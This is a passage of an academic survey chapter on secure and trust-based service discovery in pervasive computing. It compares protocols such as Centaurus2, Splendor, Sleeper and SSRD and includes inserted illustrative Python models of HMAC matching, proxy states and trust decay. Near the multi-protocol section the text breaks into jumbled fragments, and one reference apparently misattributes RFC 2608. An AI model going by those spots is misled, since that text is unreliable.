SPDP                   No        No               Yes          No           Yes       N/A      No       No
Progressive Exposure   No        Yes              No           No           No        Yes      Limited  No
Splendor               No        Yes              No           No           Yes       Yes      N/A      No
Jini                   No        N/A              No           No           N/A       Yes      N/A      Limited
CSAS                   No        No               Yes          No           N/A       N/A      Yes      No
CSM                    Yes       No               Yes          No           N/A       N/A      Yes      No
AVCM                   Limited   No               Yes          No           Yes       Yes      Yes      No
CSRA                   No        Yes              No           No           N/A       N/A      Yes      Yes
TRAC                   No        N/A              No           No           Yes       Yes      N/A      Yes
SME                    Yes       N/A              N/A          Yes          N/A       Yes      No       N/A
HCA                    No        N/A              Yes          No           No        Yes      No       N/A
SSRD                   Yes       No               Yes          Yes          Yes       Yes      Limited  No
SSRD+                  Yes       No               Yes          Yes          Yes       Limited  Yes      No
Centaurus              Yes       Yes              No           No           No        N/A      Yes      No
SLP                    No        Yes              Yes          Yes          No        No       No       No
Sleeper                Yes       No               Yes          Yes          Yes       Yes      No       No

As an extension of project Centaurus (Kagal, Korolev, Avancha, et al., 2001; Kagal, Korolev, Chen, et al., 2001), Centaurus2 (Undercoffer et al., 2003) provides a secure mechanism for service discovery and enables users to access services across heterogeneous network domains. The system uses a local certificate authority (CA), and each entity must be pre-registered in the system. The CA issues a certificate to each identified and verified entity. The design of Centaurus2 includes four components, and each component has a separate private key which is stored at the client using PKCS #11:

1. The local CA is responsible for issuing digital certificates and for validating these digital certificates.



2. The communication manager mediates communication between clients and networked services.
3. Group membership(s) is maintained and stored by the capability manager.
4. Each client is registered to a specific service manager that ensures security and access rights, and mediates between user client and service client. Service managers maintain a service registry.

Each domain has a root service manager. Static bridges are configured between service managers in different domains. Then clients in separate domains can access services across domains using the root service manager as the context.

In SSDS (Czerwinski et al., 1999), both service advertisement pull (query) and push (announcement) are supported. Service advertisements are stored in a hierarchy of servers. SSDS provides capability-based access control. All information passed between clients and servers is encrypted. A single copy of the resource information is stored and accessed, which makes the system vulnerable to a single point of failure. Subsequently, the Ninja project (Goldberg et al., 1999; Gribble et al., 2001) added the concept of secure identification of services through SSDS. In Ninja, the CA issues valid certificates and the capability manager authorizes user access to a particular resource. The service providers can also prescribe the conditions (capabilities) that are needed by a user in order to discover a particular service.

The context-sensitive authorization scheme (CSAS) (Minami & Kotz, 2005) provides authorization without a central server or CA. When a CSAS user wants to access a service from a resource, the associated server issues a logical authorization query and sends it to the host of the resource. Each host has a knowledge domain with which it attempts to prove the authorization query. If it fails, it distributes several portions of the proof to multiple hosts. Through this distribution CSAS reduces the computational overhead on any single node. After collecting the sub-proofs from the other hosts, the host of the resource can declare the result of the query to be true or false, thus indicating grant of access or denial respectively. This approach facilitates confidentiality, integrity, and scalability. To authorize access, CSAS uses previously stored information, which may be difficult to collect for users in an ad hoc network.

Splendor (Zhu et al., 2003) is a secure, private, and location-aware service discovery protocol. Splendor adapts depending on the network environment to use either a client-service model or a client-service-directory model. Proxies are used to offload workload from mobile services. Mobile services authenticate with proxies, and proxies handle registration. In these situations, proxies are considered to be trusted servers. However, if no trusted server is available in an environment, then there is no agent to handle the registration. Its security model is based on mutual authentication.

Progressive Exposure (Zhu et al., 2004, 2006) is a secure service discovery approach. It addresses privacy issues using a mutual matching technique. Progressive Exposure addresses security and fairness by not exposing too much information. In each round of message exchange between the communicating parties, it tries to find whether any mismatch occurs. In case of a mismatch, the communication stops. It uses one-time code words and a hash-based message authentication code. It considers the presence of one user and one service provider, but it does not address situations in which many users and many service providers are present. When a service provider leaves the network, the process of provider lookup and the authentication phase is restarted. It provides privacy for service information, requests, domain identity, and user credentials, and is based on the client-service-directory model.

Infrastructure-Less Security

SPDP (Almenarez & Campo, 2003) is a secure service discovery protocol based on the PTM (Almenarez, Marin, Campo, & Garcia, 2004; Almenarez, Marin, Dyaz, & Sanchez, 2006) model. The need for a centralized server is avoided by having each device act as its own CA. For a service request, this model uses broadcast messaging. The requesting device updates its cache after getting a reply from the devices (if any reply). It then stores the device identities that it believes trustworthy. The devices' user agents continually listen for messages, which in turn means continual energy consumption.

Shankar and Arbaugh (2002) propose an attribute vector calculus model (AVCM) for modeling trust. Their model describes both identity-based trust and context-based trust and is one of the first models that discusses the importance of trust in a ubiquitous environment. Brezillon and Mostefaoui (2004) present a context-based security model (CSM), and they discuss the need for adaptive security based on the particular situation. Thomas and Sandhu (2004) present the challenges and research issues for secure pervasive computing. They express the need for a dynamic trust model, as the pervasive computing environment poses new kinds of security challenges due to its diverse nature. They present a socio-technical view.

Smart Space Dependent Security

A smart space provides devices with complex computational support that supports context-awareness and collaboration. Components of the smart space can offload secure discovery tasks and relate them to other activities in the space. Examples include context-based secure resource access (CSRA) (Tripathi et al., 2004) and trust-based architecture (TRAC) (Basu & Callaghan, 2005).

CSRA (Tripathi et al., 2004) focuses on context-aware discovery of resources and how to access resources in a secure and unobtrusive manner. In a pervasive computing environment the rules and limitations imposed by the user, the system, and the collaborative activity scenario have to be combined dynamically at runtime. CSRA uses a namespace related to each user and domain. These namespaces collect resources, services, and activities. The binding protocol defines the association of a user to a specific resource in the space. The binding changes based on the contextual information of the user, including the location, activity, and role. A descriptor is associated with each namespace that combines functional attributes collected from resource descriptions in Web services description language (WSDL) and resource description framework (RDF) conditions for security, and policies for the binding protocol. The binding protocol specifies whether the binding of a resource is "shared" or "private," and whether the binding is "permanent" or "context-based."

Basu and Callaghan (2005) present TRAC for increasing security and user confidence in pervasive computing systems. They use trust and role-based access control for ensuring security and privacy. However, their model is aimed at an intelligent environment (IE) only. This policy-based model allows users to define policies for themselves and thus gives users control to define their own security level. This model works in an IE because every user is known beforehand. However, in a truly pervasive environment it is not possible to have prior information about every user, and thus this model is not applicable.

EXAMPLES USING TRUST MODELS

We next describe two service discovery protocols, Sleeper and SSRD, which incorporate trust models for infrastructure-less security.

Sleeper

Sleeper (Buford, Celebi, et al., 2006) is an energy-preserving service discovery protocol which features dynamic proxy selection for advertisement and discovery, so that nodes can go to power standby while the proxy advertises on their behalf. The basic node states and transitions for Sleeper are shown in Figure 2. An off-line or disconnected node moves to an online state and broadcasts a join message that includes its advertisements and their popularity metrics. The current proxy caches these advertisements. Any proxy-candidate node may also cache these advertisements. An online node may broadcast a leave message prior to going off-line; if a leave message is not transmitted, advertisements may be purged from the proxy's and other online nodes' caches by expiration. Transitions to/from the standby state may also be indicated by broadcast messages.
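Before continuing with Sleeper, the round-by-round mutual matching of Progressive Exposure, described in the Infrastructure-Based Security subsection above, can be made concrete. The following is an added example and is not the Progressive Exposure protocol's own code or message format. It assumes that the user and the service directory already share a secret key for the domain (how that key is established is outside the example), derives a one-time code word per round as an HMAC over a session nonce, the round number and the attribute being matched, and stops at the first mismatch. The domain key, the attribute vocabulary and the sample parties are all constructed.

```python
import hashlib
import hmac
import secrets


def code_word(key, session_nonce, round_no, attribute):
    """One-time code word for one attribute: HMAC over nonce, round and value.

    Without the key, an eavesdropper cannot check a guessed attribute against
    the code word; the nonce makes code words differ between sessions, so a
    captured one cannot be replayed later.
    """
    message = session_nonce + round_no.to_bytes(2, "big") + attribute.encode()
    return hmac.new(key, message, hashlib.sha256).digest()


class Party:
    """A user or a service directory holding an ordered list of attributes."""

    def __init__(self, name, key, attributes):
        self.name = name
        self.key = key
        self.attributes = list(attributes)
        self.rounds_exposed = 0  # how many attributes this party has committed to

    def commit(self, session_nonce, round_no):
        self.rounds_exposed = round_no + 1
        return code_word(self.key, session_nonce, round_no, self.attributes[round_no])

    def matches(self, session_nonce, round_no, received):
        expected = code_word(self.key, session_nonce, round_no, self.attributes[round_no])
        return hmac.compare_digest(expected, received)


def progressive_match(user, service, session_nonce):
    """Run the exchange; return (all_rounds_matched, rounds_completed).

    In each round both sides send the code word for their next attribute and
    check the peer's. The first mismatch ends the exchange, so a party that
    fails early has revealed (and learned) only the code words up to that round.
    """
    rounds = min(len(user.attributes), len(service.attributes))
    for r in range(rounds):
        from_user = user.commit(session_nonce, r)
        from_service = service.commit(session_nonce, r)
        if not (service.matches(session_nonce, r, from_user)
                and user.matches(session_nonce, r, from_service)):
            return False, r
    return True, rounds


# Constructed sample data: the secret a domain's members share, and the
# attribute list the two sides expect to agree on, least sensitive first.
DOMAIN_KEY = b"constructed-domain-secret"
USER_ATTRS = ["printer", "dept-engineering", "colour-duplex"]


def demo(session_nonce=None):
    """Three exchanges: a full match, a mismatch in round 1, an outsider."""
    nonce = secrets.token_bytes(16) if session_nonce is None else session_nonce
    user = Party("alice-phone", DOMAIN_KEY, USER_ATTRS)
    good = Party("printer-eng", DOMAIN_KEY, ["printer", "dept-engineering", "colour-duplex"])
    wrong_dept = Party("printer-fin", DOMAIN_KEY, ["printer", "dept-finance", "colour-duplex"])
    outsider = Party("rogue", b"does-not-know-the-domain-key", USER_ATTRS)
    return {
        "good": progressive_match(user, good, nonce),
        "wrong_dept": progressive_match(user, wrong_dept, nonce),
        "outsider": progressive_match(user, outsider, nonce),
    }


if __name__ == "__main__":
    for label, (matched, rounds) in demo().items():
        print(f"{label:10s} matched={matched} rounds_completed={rounds}")
```

Ordering attributes from least to most sensitive bounds what an early mismatch reveals, and a party outside the domain is rejected in round 0 without learning even the first attribute. The shared domain key is this example's stand-in for whatever secret the real protocol's code words derive from; the chapter does not specify it, so the derivation above should not be read as the published scheme.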
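The join, leave, standby and proxy transitions of Sleeper described above, together with the proxy bootstrap among proxy-candidates described in the next paragraph, can be simulated for a single broadcast domain. This is an added example and not the Sleeper implementation: the advertisement lifetime, the cache living at the proxy and being handed over whole when the proxy vacates, and the election of the earliest online proxy-candidate are assumptions made for the simulation; the node names and services are constructed.

```python
ADVERT_TTL = 30.0  # assumed: seconds a cached advertisement lives without a refresh


class Node:
    def __init__(self, name, proxy_capable, services):
        self.name = name
        self.proxy_capable = proxy_capable
        self.services = dict(services)   # service name -> popularity metric
        self.state = "offline"           # offline | online | standby
        self.role = "non-proxy"          # non-proxy | proxy-candidate | proxy


class SleeperNet:
    """One broadcast domain: at most one proxy and the advertisement cache it holds."""

    def __init__(self):
        self.nodes = {}
        self.proxy = None
        self.candidates = []   # proxy-capable nodes in join order (assumed bootstrap order)
        self.cache = {}        # (owner, service) -> (popularity, expires_at)

    def _refresh(self, node, now):
        for service, popularity in node.services.items():
            self.cache[(node.name, service)] = (popularity, now + ADVERT_TTL)

    def _bootstrap_proxy(self):
        # No proxy detected: the first online proxy-candidate issues the
        # bootstrap and becomes the proxy.
        for cand in self.candidates:
            if cand.state == "online":
                cand.role = "proxy"
                self.proxy = cand
                return cand
        self.proxy = None
        return None

    def join(self, node, now):
        """Join broadcast: carries the node's advertisements and popularity."""
        self.nodes[node.name] = node
        node.state = "online"
        if node.proxy_capable:
            node.role = "proxy-candidate"
            self.candidates.append(node)
        self._refresh(node, now)
        if self.proxy is None:
            self._bootstrap_proxy()

    def leave(self, node, now):
        """Leave broadcast: the node's advertisements are purged at once."""
        node.state = "offline"
        for key in [k for k in self.cache if k[0] == node.name]:
            del self.cache[key]
        if node in self.candidates:
            self.candidates.remove(node)
        if self.proxy is node:
            node.role = "non-proxy"
            self.proxy = None
            self._bootstrap_proxy()   # vacating proxy hands its cache to the successor

    def standby(self, node, now):
        """Standby broadcast: the proxy keeps advertising on the node's behalf."""
        node.state = "standby"
        self._refresh(node, now)

    def wake(self, node, now):
        node.state = "online"
        self._refresh(node, now)

    def expire(self, now):
        """Purge advertisements of nodes that vanished without a leave message."""
        for key in [k for k, (_, exp) in self.cache.items() if exp <= now]:
            del self.cache[key]

    def discover(self, service, now):
        """Query answered from the proxy cache; returns sorted provider names."""
        self.expire(now)
        return sorted(owner for (owner, svc) in self.cache if svc == service)


if __name__ == "__main__":
    net = SleeperNet()
    a, b = Node("A", True, {"print": 5}), Node("B", False, {"share": 2})
    net.join(a, 0.0)
    net.join(b, 1.0)
    net.standby(b, 3.0)
    print("proxy:", net.proxy.name, "share providers at t=4:", net.discover("share", 4.0))
    net.leave(a, 5.0)
    print("proxy after A left:", net.proxy, "share at t=34:", net.discover("share", 34.0))
```

A proxy that disappears without a leave message is not modelled: in the chapter's description the remaining proxy-candidates detect the absence of advertisement broadcasts, which needs a timer on top of this model, and the new proxy then either receives the old cache or re-collects advertisements through the bootstrap.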



An online node can be in one of four states (Figure 2). Every node initially goes online as a non-proxy node. A proxy-capable node becomes a proxy-candidate. There may be more than one proxy-candidate at any time. When no proxy is detected, for example by the absence of a service advertisement broadcast or at the exit of a proxy, the first proxy-candidate to issue the proxy bootstrap becomes the proxy. A vacating proxy may transfer its cache to the new proxy, or the new proxy may collect advertisements from online nodes through the bootstrap. Nodes which are in the standby state during the proxy change may be polled by the new proxy after the standby node transitions to online.

Figure 2. Sleeper node states and state transitions; online nodes can be in one of four states (Buford et al., 2006)

Sleeper uses property-based peer trust to secure service discovery operations. In property-based or credential-based trust (Hess et al., 2002; Seamons, Winslett, & Yu, 2001), each party has a set of certified attributes (e.g., credit card numbers, employee ID) that are exchanged to establish mutual trust. The typical components of a mechanism to provide property-based trust include:

• Trust negotiation protocol
• Trust negotiation policies
• Credentials

A method for trust negotiation has been defined for the client-server context (Hess et al., 2002; Seamons et al., 2001). In this design, access control policies determine which credentials, services, and policies should be disclosed during a negotiation. Policies and credentials are secured locally at each node but are disclosed during negotiation to the remote party. Sleeper nodes establish mutual trust using the trust negotiation mechanism defined in Buford, Park, and Perkins (2006). Assuming that each peer caches public keys for the certificate issuers that are relevant to its peer trust policies, peer trust establishment can be performed without a centralized authority. A service discovery mechanism is privacy preserving if a peer can discover the service description using the mechanism only if the peer satisfies the criteria C. Thus a mechanism that only distributes service descriptions to peers which are members of group G with criteria C is privacy preserving. Sleeper uses trust negotiation to create groups of peers that satisfy membership criteria C. Group management is provided by a group service (GS) that is available at every peer. The GS caches private service descriptions for each group and allows only group members to retrieve them. The GS publishes encrypted service descriptions that can only be decrypted by members of G. These encrypted service descriptions are broadcast to all connected peers, but can only be decrypted by group members.

The secure agent technology (Buford, Park, et al., 2006) used in Sleeper for trust negotiation can also be used for enabling trust in service composition (Buford, Kumar, & Perkins, 2006).

Figure 3. Sleeper groups in broadcast of advertisements; symmetric keys are broadcast with public key encryption (Buford, Celebi, et al., 2006)

SSRD

With a view to ensuring enhanced security through a lightweight solution for resource discovery in a pervasive environment, simple and secure resource discovery (SSRD) has been proposed by the researchers in Sharmin et al. (2006a). The fundamental part of the solution is a trust-based, service-oriented adaptive security mechanism built on middleware adaptability for resource discovery, knowledge usability, and self-healing (MARKS), a middleware and framework developed for resource-constrained pervasive devices and pervasive applications (Sharmin et al., 2006b). The SSRD unit of MARKS consists of trust management and security management sub-units, and it provides a resource discovery agent (Figure 4).

Figure 4. Resource discovery model (Sharmin et al., 2006a)

The trust management unit is responsible for maintaining trust relationships with other devices. It calculates trust values for the relationships between devices and also updates the trust values depending on the behavior of the service provider or requester. It maintains a list of service-specific average trust values and communicates with the security management unit whenever necessary. Trust values are quantified in the range of 0.0 to 1.0 to represent the degree of trustworthiness of a node. Complete trust and complete distrust are represented by 1.0 and 0.0 respectively. A new device with no prior interaction record is assigned a value of 0.5, which indicates a neutral condition. Trust is dynamic: it evolves over time and, depending on the service, may be asymmetric and transitive. Each owner or manager of a device retains a table that indicates the security level (ranging from 1 to 10) required by each of the available services or applications. The resource manager consults "Service-trust" for all the neighboring nodes to decide whether the service could be provided. For example, for services with security level < 5, no trust calculation or secure communication is needed. For services with higher security levels, trust is first calculated and then secure communication is established between the provider and the requester. This lessens both the computation cost and the communication overhead.

Trust models are designed to associate each device with a trust value based on past behavior with the requesting device. Also, when we calculate a trust value for an unknown device, we consider the PGP (Zimmermann, 1995) based trust model. PGP is based on mutual certification of the validity of keys. In case a new device joins the network, or a device has never communicated with a service-providing device, the service-providing device generates a multicast message to all devices that it has interacted with and asks for their recommendation about this device. From the recommendations the trust value is calculated for that service. The issue of dynamic update of trust values has been addressed more clearly, with specific situations, in the researchers' enhanced adaptation of this model named SSRD+ (Sharmin, Ahmed, & Ahamed, 2006c).

FUTURE RESEARCH

The open and dynamic nature of the pervasive computing environment requires a security mechanism that is unobtrusive to the user and makes it possible to securely provide and discover the services available for the user in a transparent manner. Some of the open issues regarding challenges in secure and private service discovery are highlighted in this section.

Privacy

Although contextual information plays a pivotal role in dynamic pervasive environments, it may also expose private information. When granting access to a service, a person's context information like location, time, and activity can be exposed. Further, policies and constraints are themselves subject to privacy protection. Private information management, such as the recursive constraint-based security model in Hengartner and Steenkiste (2006), is one approach to prevent direct information leakage. However, such mechanisms are generally susceptible to attacks involving collusion and inference.

In a context- and location-sensitive medical application, researchers developed a system for practitioners to easily share context in their work tasks. Subsequently, questions of privacy led the designers to limit access to this information. As another example, the Gaia project has shown a privacy-preserving hop-by-hop routing algorithm that carries information about the location of the user but does not reveal the exact location or identity of the user. Thus the privacy level and willingness to disclose personal information vary depending on information type, collection method, time, and other factors. In some scenarios users are reluctant to disclose identity information but do not care about location information. The situation might be reversed in other cases. Formulation of policies that are understood and can be managed by users is an important goal.

Trust

As discussed earlier, a key element for secure service discovery in ad hoc environments is the ability to establish a level of trust between peers. The trust life cycle can be narrated in short as trust formation, evolution, and exploitation. In general, trust is formed by experience through earlier interactions, verifiable properties of a party, recommendations from trusted entities, and reputation in a community. The challenges faced during trust establishment are due to the absence of a global trust framework, the large number of autonomous and anonymous entities, the large number of domains, and different trust requirements for a large number of application contexts.

Recent context-aware trust models focus on dynamic trust values, which are updated over time and distance and incorporate behavioral models for the evolution of trust. Risk analysis maps each action to possible outcomes associated with a cost/benefit. Decisions consider the likelihood of the risk and the cost. Unresolved issues in trust establishment include detecting and preventing collusion, managing the trade-off between privacy and property disclosure, and efficient trust mechanisms in large communities.

Multi-Protocol Environments

The combination of multi-homed mobile devices and multiple service discovery protocols means that service access may cross not only administrative boundaries but also different service discovery domains with varying security properties. As an example, a mobile device may include protocol support for Bluetooth, SLP, and UPnP. Then the device can easily discover services in the different domains that it roams to, even if these domains use different service discovery protocols. As a multi-homed device, it may simultaneously connect to domains with different service discovery protocols.

As a second example, a single user may have a set of personal mobile devices configured in a PAN. These devices can use the PAN security mechanism for security and privacy control, and identity-based authentication for mutual trust. The PAN may support a specific service discovery protocol. One or more of the devices in the PAN may also connect to outside networks with different service discovery protocols and security mechanisms.

Figure 5. Conceptual diagram of SSRD model (Sharmin et al., 2006b)

These types of scenarios indicate that future mobile devices may need to operate in multiple security contexts. In these cases there is the potential for conflicting access policies and unanticipated information flows between different regions. Further, there are challenges in managing groups [...]

[...] services that may be created from different service sources. Composition trust bindings (Buford, Kumar, et al., 2006) are one approach for providing trust in both control and data paths in peer-to-peer
across domains and mapping service semantics service composition.
and identities between different domains.
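The Trust discussion above names two mechanisms without showing them: trust values that are updated from observed behaviour and decay when no fresh evidence arrives, and a risk analysis that maps an action to its outcomes with a cost/benefit before a decision is taken. The following Python illustration is added here to make both concrete; it is not code from the chapter or from any of the trust models it cites. The half-life constant, the update rate, the peer name and the benefit/cost figures are constructed assumptions chosen for readability.

```python
import math

HALF_LIFE_S = 3600.0  # assumed: trust evidence loses half its weight per hour


class PeerTrust:
    """Dynamic trust value for one peer (constructed illustration, not a model
    from the chapter): evidence decays toward a prior when no new behaviour is seen."""

    def __init__(self, peer, prior=0.5):
        self.peer = peer
        self.prior = prior       # value trust relaxes to without fresh evidence
        self.value = prior       # trust right after the last observation
        self.last_update = 0.0   # time (seconds) of the last observation

    def decayed(self, now):
        """Trust as seen at time `now`, with exponential decay toward the prior."""
        age = max(0.0, now - self.last_update)
        weight = math.exp(-math.log(2.0) * age / HALF_LIFE_S)
        return self.prior + (self.value - self.prior) * weight

    def observe(self, now, good, rate=0.2):
        """Behavioural update: move a fraction `rate` of the way toward 1 after a
        good interaction and toward 0 after a bad one."""
        current = self.decayed(now)
        target = 1.0 if good else 0.0
        self.value = current + rate * (target - current)
        self.last_update = now


def expected_value(trust, benefit, cost):
    """Risk analysis for one action: gain `benefit` if the peer behaves (probability
    taken to be the trust value) and lose `cost` if it does not."""
    return trust * benefit - (1.0 - trust) * cost


def decide(record, now, benefit, cost):
    """Grant the action only when its expected value at time `now` is positive."""
    return expected_value(record.decayed(now), benefit, cost) > 0.0


def scenario():
    """Constructed walk-through: three good interactions with 'peer-A', then the
    same decision taken immediately and again two hours later with no new evidence."""
    peer = PeerTrust("peer-A")
    for t in (0.0, 0.0, 0.0):
        peer.observe(t, good=True)
    return (round(peer.decayed(0.0), 3),
            decide(peer, 0.0, benefit=1.0, cost=2.0),
            round(peer.decayed(7200.0), 3),
            decide(peer, 7200.0, benefit=1.0, cost=2.0))
```

The point the walk-through makes is that the same action can be granted right after good behaviour was observed and refused two hours later, purely because stale evidence carries less weight; a decision rule that ignored time would keep granting it. The cost side should be weighted by what a misbehaving peer can actually do with the access, which is the part of the risk analysis that depends on the application context.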

Trust in Service Composition

A device in a pervasive computing environment may offer a service to other devices. The service may be aggregated from services offered by other devices. By aggregating service facilities across devices, a collection of limited-resource devices may be able to offer services that would otherwise not be available. However, devices which invoke or participate in these services may be concerned about the integrity and trustworthiness of the various components that are combined to provide these services. Existing service discovery mechanisms do not expose such nested or recursive relationships when a service is offered or invoked.

Conventional methods for assuring trustworthiness of software components are typically used to convey trustworthiness to the end user or developer. They provide no explicit representation of trust between distributed components. Further, these methods do not explicitly validate composite services that may be created from different service sources. Composition trust bindings (Buford, Kumar, et al., 2006) are one approach for providing trust in both control and data paths in peer-to-peer service composition.

Conclusion

The general availability of broadband-wireless-enabled devices is a key catalyst in enabling many powerful peer-to-peer usage patterns, which have been described as pervasive computing. However, these usage scenarios will frequently involve devices which are outside a single secure administrative boundary and may include ad hoc interactions where no prior trust relationship exists. Further, there is significant variation in basic authentication, authorization, and privacy mechanisms offered in wireless networks. Consequently many existing designs for service discovery have insufficient security, privacy, and trust support.

Assuming that most wireless networks will in the future provide encrypted transmission, user/device authentication, and authorization control in a given administrative domain, there remain important security related questions for service discovery in cross-domain cases, in ad hoc


cases, and when the devices/users are not a priori mutually authenticated. Consequently, we do not expect that improvements in the security of wireless networks, while important, will be sufficient to address all the requirements identified here for secure service discovery.

Toward this end, after surveying a variety of approaches to secure service discovery today, we presented case studies of two recent service discovery protocols, which include trust establishment mechanisms to enable trust between a priori untrusted devices and peers. We also provided a summary of future research directions.

References

Almenarez, F., & Campo, C. (2003). SPDP: A secure service discovery protocol for ad-hoc networks. In Ninth Open European Summer School and IFIP Workshop on Next Generation Networks (EUNICE 2003) (pp. 213-218).

Almenarez, F., Marin, A., Campo, C., & Garcia, C. (2004). PTM: A pervasive trust management model for dynamic open environments. In Pervasive Security, Privacy, and Trust (PSPT 2004).

Almenarez, F., Marin, A., Dyaz, D., & Sanchez, J. (2006). Developing a model for trust management in pervasive devices. In Fourth Annual IEEE International Conference on Pervasive Computing and Communications Workshops (PERCOMW '06) (pp. 267-271).

Balazinska, M., Balakrishnan, H., & Karger, D. (2002). INS/Twine: A scalable peer-to-peer architecture for intentional resource discovery. In International Conference on Pervasive Computing (pp. 195-210).

Barbeau, M. (1999). Service discovery in a mobile agent API using SLP. In Global Telecommunications Conference (GLOBECOM '99) (Vol. 1a, pp. 391-395).

Basu, J., & Callaghan, V. (2005). Towards a trust based approach to security and user confidence in pervasive computing systems. In IEE International Workshop on Intelligent Environments (IE 2005) (pp. 223-229).

Bluetooth Special Interest Group. (2001a). Specification of the Bluetooth system—Core [Version 1.1].

Bluetooth Special Interest Group. (2001b). Specification of the Bluetooth system—Core [Version 1.1]. SDP specification (Vol. 1, part E).

Brezillon, P., & Mostefaoui, G. (2004). Context-based security policies: A new modeling approach. In Second IEEE International Conference on Pervasive Computing and Communications Workshops (pp. 154-158).

Buford, J., Brown, A., & Kolberg, M. (2006). Meta service discovery. In Proceedings of the Fourth IEEE Conference on Pervasive Computing and Communications Workshops, Workshop on Mobile Peer-to-peer (pp. 124-129).

Buford, J., Burg, B., Celebi, E., & Frankl, P. (2006). Sleeper: A power-conserving service discovery protocol. In Third Annual International Conference on Mobile and Ubiquitous Systems, Networking, and Services (Mobiquitous 2006) (pp. 1-10).

Buford, J., Celebi, E., & Frankl, P. (2006). Property-based peer trust in the sleeper service discovery protocol. In 30th Annual International Computer Software and Applications Conference (COMPSAC '06), Workshop on Security, Privacy, and Trust for Pervasive Applications (SPTPA 2006) (Vol. 2, pp. 209-214).

Buford, J., Kumar, R., & Perkins, G. (2006). Composition trust bindings in pervasive computing service composition. In Proceedings of the Fourth IEEE Conference on Pervasive Computing and Communications Workshops, Workshop on Pervasive Computing and Communication Security (PerSec) (pp. 261-266).

Buford, J., Park, I., & Perkins, G. (2006). Social certificates and trust negotiation. In Third IEEE Consumer Communications and Networking Conference (CCNC 2006) (pp. 615-619).


Chen, Y., Jensen, C., Gray, E., Cahill, V., & Seigneur, J. (2003). A general risk assessment of security in pervasive computing (Tech. Rep. No. TCD-CS-2003-45). The University of Dublin, Trinity College, Department of Computer Science.

Cotroneo, D., Graziano, A., & Russo, S. (2004). Security requirements in service oriented architectures for ubiquitous computing. In Proceedings of the Second Workshop on Middleware for Pervasive and Ad-hoc Computing (pp. 172-177).

Czerwinski, S., Zhao, B., Hodes, T., Joseph, A., & Katz, R. (1999). An architecture for a secure service discovery service. In Fifth Annual International Conference on Mobile Computing and Networks (MobiCom '99) (pp. 24-35).

Ganu, S., Krishnakumar, A., & Krishnan, P. (2004). Infrastructure-based location estimation in WLAN networks. In IEEE Wireless Communications and Networking Conference (WCNC) (pp. 465-470).

Garlan, D., Siewiorek, D., Smailagic, A., & Steenkiste, P. (2002). Project Aura: Towards distraction-free pervasive computing. IEEE Pervasive Computing, 1(2), 22-31.

Goldberg, I., Gribble, S., Wagner, D., & Brewer, E. (1999). The Ninja jukebox. In Proceedings of the Second USENIX Symposium on Internet Technologies and Systems (USITS-99) (pp. 37-46).

Gribble, S., Welsh, M., Von Behren, R., Brewer, E., Culler, D., Borisov, N., et al. (1999). Service location protocol version 2 (RFC 2608). Retrieved from http://www.faqs.org/rfcs/rfc2608.html

He, R., Niu, J., Yuan, M., & Hu, J. (2004). A novel cloud-based trust model for pervasive computing. In The Fourth International Conference on Computer and Information Technology (CIT '04) (pp. 693-700).

Hengartner, U., & Steenkiste, P. (2006). Avoiding privacy violations caused by context-sensitive services. In Proceedings of the Fourth Annual IEEE International Conference on Pervasive Computer and Communications (PerCom 2006) (pp. 222-233).

Hess, A., Jacobson, J., Mills, H., Wamsley, R., Seamons, K., & Smith, B. (2002). Advanced client/server authentication in TLS. In Network and Distributed System Security Symposium.

Joseph, A., Katz, R., Mao, Z., Ross, S., & Zhao, B. (2001). The Ninja architecture for robust Internet-scale systems and services. Computer Networks, 35(4), 473-497.

Kagal, L., Finin, T., & Joshi, A. (2001). Trust-based security in pervasive computing environments. IEEE Computer, 34(12), 154-157.

Kagal, L., Finin, T., Joshi, A., & Greenspan, S. (2006). Security and privacy challenges in open and dynamic environments. IEEE Computer, 39(6), 89-91.

Kagal, L., Korolev, V., Avancha, S., Joshi, A., Finin, T., & Yesha, Y. (2001). Highly adaptable infrastructure for service discovery and management in ubiquitous computing (Tech. Rep. No. TR CS-01-06). Baltimore: University of Maryland, Department of Computer Science and Electrical Engineering.

Kagal, L., Korolev, V., Chen, H., Joshi, A., & Finin, T. (2001). Project Centaurus: A framework for intelligent services in a mobile environment. In International Workshop of Smart Appliances and Wearable Computing, International Conference of Distributed Computing Systems (pp. 195-201).

Kindberg, T., & Fox, A. (2002). System software for ubiquitous computing. IEEE Pervasive Computing, 1(1), 70-81.

Kopp, H., Lucke, U., & Tavangarian, D. (2005). Security architecture for service-based mobile environment. In Proceedings of the Third IEEE Conference on Pervasive Computing and Communications Workshops (pp. 199-203).

Lee, C., & Helal, S. (2002). Protocols for service discovery in dynamic and mobile networks. International Journal of Computer Research, 11(1), 1-12.

Matsumiya, K., Tamaru, S., Suzuki, G., Nakazawa, J., Takashio, K., & Tokuda, H. (2004). Improving


security for ubiquitous campus applications. In Symposium on Applications and the Internet Workshops (SAINT 2004) (pp. 417-422).

Microsoft Corporation. (2000). Universal plug and play device architecture, Version 1.0.

Miller, B., Nixon, T., Tai, C., & Wood, M. (2001). Home networking with universal plug and play. IEEE Communications Magazine, 39(12), 104-109.

Minami, K., & Kotz, D. (2005). Secure context-sensitive authorization. In Proceedings of the Third International Conference on Pervasive Computing and Communications Workshops (PerCom 2005) (pp. 257-268).

Nidd, M. (2001). Service discovery in DEAPspace. IEEE Personal Communications, 8(4), 39-45.

Pearson, S. (2005). How trusted computers can enhance privacy preserving mobile applications. In Proceedings of the Sixth International IEEE Symposium on a World of Wireless Mobile and Multimedia Networks (WoWMoM '05) (pp. 609-613).

Robinson, P., Vogt, H., & Wagealla, W. (Eds.). (2005). Privacy, security and trust within the context of pervasive computing. Heidelberg, Germany: Springer-Verlag.

Saha, S., Chaudhuri, K., Sanghi, D., & Bhagwat, P. (2003). Location determination of a mobile device using IEEE 802.11b access point signals. In IEEE Wireless Communications and Networking Conference (WCNC) (pp. 1987-1992).

Satyanarayanan, M. (1996). Fundamental challenges in mobile computing. In Fifteenth ACM Symposium on Principles of Distributed Computing (pp. 1-7).

Seamons, K., Winslett, M., & Yu, T. (2001). Limiting the disclosure of access control policies during automated trust negotiation. In Network and Distributed System Security Symposium.

Shankar, N., & Arbaugh, W. (2002). On trust for ubiquitous computing. Workshop on Security in Ubiquitous Computing (UBICOMP 2002).

Sharmin, M., Ahmed, S., & Ahamed, S. (2006a). MARKS (middleware adaptability for resource discovery, knowledge usability, and self healing) in pervasive computing environments. In Third International Conference on Information Technology: New Generations (pp. 306-313).

